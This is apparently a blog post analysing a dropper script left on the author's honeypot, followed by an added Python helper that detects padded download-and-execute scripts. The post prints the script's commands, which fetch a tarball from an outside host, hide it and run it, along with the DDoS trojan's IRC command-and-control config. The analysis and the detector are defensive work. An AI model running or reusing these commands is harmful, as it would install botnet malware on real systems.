This piece of malware, a file simply named "DDoser", was dropped onto my Linux honeypot.
The file has a 0% detection rate. Interesting.
This appears to simply be a Linux/UNIX shell script.
It starts with the following line repeated multiple times:
echo "2e61e112030709378914f8280fd09f62e61e112030709378914f8280fd09f62e61e112030709378914f8280fd09f62e61e112030709378914f8280fd09f62e61e112030709378914f8280fd09f6"
An echo powered DDoS script? That doesn't make sense...
And ends with the following lines:
clear
echo
echo "**********************************************"
echo "The Installation Of D3v1Lz T34m Ddoser"
echo "Should Be Running Now On D3v1Lz Ircds"
echo
echo "Make Sure That Ddoser Is Running - Use This Command:"
echo "ps x"
echo
echo "If You See 'addict' Listed, Then It's Running."
echo "You Can Then Fuck Ips Randomly On Your Botnets."
echo "**********************************************"
echo
echo "Enjoy Our Best Services At WebShells Co. , For More"
echo "Info Contact Us On Tech@WShells.Ws Or Call Us On 03-50 12 10"
echo "More Info About Script: Chadi@WShells.Ws"
exit 0
fi
A closer inspection reveals the true nature of this file...
After repeating the "garbage" echo line multiple times, the following code executes:
#!/bin/sh
clear
wget http://d3v1lz.at.ua/DvLz-T34m.tar.gz
tar -zxvf DvLz-T34m.tar.gz
rm -rf DvLz-T34m.tar.gz
killall -9 addict
mv DvLz-T34m .dt
chmod +x .dt
cd .dt
chmod +x *
./start.sh
clear
cd
rm -rf DvLz-T34m
The file DvLz-T34m.tar.gz has a 37% detection rate through generic detections...
This script downloads and installs an apparent DDoS trojan which reports to an IRC command and control center...
File "mech.set"
NICK DvLz
USERFILE user
CMDCHAR .
LOGIN DvLz
IRCNAME D3v1Lz T34m Dd0ser
MODES +ixws
TOG CC 1
TOG CLOAK 1
TOG SPY 1
SET OPMODES 4
SET BANMODES 6
SET AAWAY 1
TOG NOIDLE 1
CHANNEL #Ddos
TOG PUB 1
TOG MASS 1
TOG SHIT 1
TOG PROT 1
TOG ENFM 1
SET ENFM +nstm
SET MDL 4
SET MKL 4
SET MBL 4
SET MPL 1
server slain.wshells.ws 6667
So why did the hacker use this script to install the malware, instead of simply downloading the malware and installing it him/herself?
One possibility is to avoid automated analysis by honeypots. By uploading a script to the honeypot instead of the malware itself, any antivirus scan would have ignored the script file. Furthermore, by burying the real commands within many repeated "garbage" echo lines, the script may also escape both automated and manual analysis.
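A small triage helper for this kind of padded dropper, written as an added example (not the author's tool): it strips the repeated echo lines and checks whether what remains forms a download, unpack, hide and execute chain like the one above. The sample script and its host name are constructed placeholders, not the honeypot file.

```python
import re
from collections import Counter

# Constructed sample (not the honeypot file): one padding line repeated 200 times,
# followed by a download/unpack/hide/execute chain shaped like the dropper above.
# The host name is a placeholder, not the real download location.
SAMPLE = "\n".join(
    ['echo "2e61e112030709378914f8280fd09f62e61e112030709378914f8280fd09f6"'] * 200
    + ["#!/bin/sh", "clear",
       "wget http://dropper.example.invalid/payload.tar.gz",
       "tar -zxvf payload.tar.gz", "rm -rf payload.tar.gz",
       "killall -9 addict", "mv payload .dt", "chmod +x .dt", "cd .dt",
       "chmod +x *", "./start.sh", "clear", "cd", "rm -rf payload"])

ECHO_RE = re.compile(r"^\s*echo\b")
# Stages that, taken together, make up a download-and-execute chain.
STAGES = {
    "download": re.compile(r"\b(wget|curl)\b\s+\S*://"),
    "unpack":   re.compile(r"\btar\b\s+-?\w*x"),
    "kill":     re.compile(r"\bkillall\b\s+-9\b"),
    "hide":     re.compile(r"\b(mv|cp)\b\s+\S+\s+\.\S+"),   # rename into a dot-file/dir
    "execute":  re.compile(r"\bchmod\b\s+\+x|^\s*\./\S+"),
    "cleanup":  re.compile(r"\brm\b\s+-rf\b"),
}

def strip_padding(script):
    """Drop echo lines; return (effective_lines, padding_ratio, max_echo_repeats)."""
    lines = [l for l in script.splitlines() if l.strip()]
    echoes = [l.strip() for l in lines if ECHO_RE.match(l)]
    effective = [l for l in lines if not ECHO_RE.match(l)]
    ratio = 1 - len(effective) / len(lines) if lines else 0.0
    repeats = max(Counter(echoes).values()) if echoes else 0
    return effective, ratio, repeats

def classify(script):
    """Summarise a script: how much of it is echo padding and which chain stages remain."""
    effective, ratio, repeats = strip_padding(script)
    found = {name for line in effective for name, rx in STAGES.items() if rx.search(line)}
    # A chain needs at least a download and an execution step plus two supporting stages.
    verdict = "dropper" if {"download", "execute"} <= found and len(found) >= 4 else "no-chain"
    return {"padding_ratio": round(ratio, 2), "max_echo_repeats": repeats,
            "stages": sorted(found), "verdict": verdict}

if __name__ == "__main__":
    print(classify(SAMPLE))
```

Run against the sample it reports a padding ratio of 0.93, 200 identical echo lines and all six stages, which is the signal a scanner that only looks at the echo-heavy surface of the file misses.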
With that said, both files have been submitted to AV vendors for analysis and inclusion in their detection signatures.
To the hacker who uploaded this malware to my honeypot...thanks for the early Christmas present!
I'm sorry to say all you're getting is a lump of coal. And a letter to your ISP.